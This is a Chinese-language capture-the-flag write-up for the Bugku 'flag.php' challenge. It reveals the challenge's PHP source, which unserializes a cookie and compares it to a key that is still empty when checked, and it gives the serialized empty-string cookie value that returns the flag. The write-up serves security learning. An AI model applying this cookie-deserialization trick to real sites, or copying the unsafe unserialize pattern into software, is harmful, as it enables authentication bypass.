WP-Bugku-flag.php

题目地址http://120.24.86.145:8002/flagphp/

进入题目后看到的是登录框,题目提示“点了login咋没反应,提示:hint”

参考网上的WP,

GET传参,构造后的url:
http://120.24.86.145:8002/flagphp/?hint

就得到源码了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
 <?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>

<?php
}
$KEY='ISecer:www.isecer.com';
?>

意思是当得到 unserialize (反序列化)后的$cookie这个ISecer全等于$KEY后显示 flag
这里要注意,$KEY的值并不是$KEY='ISecer:www.isecer.com';所显示的,而是"",即空

那么php脚本一行:

1
2
3
<?php 
print_r(serialize(""));
?>

得到结果:
s:0:"";

BP抓包Go一下:

得到flag{unserialize_by_virink}

AbelChe wechat
扫码加微信
Donate here!!!
0%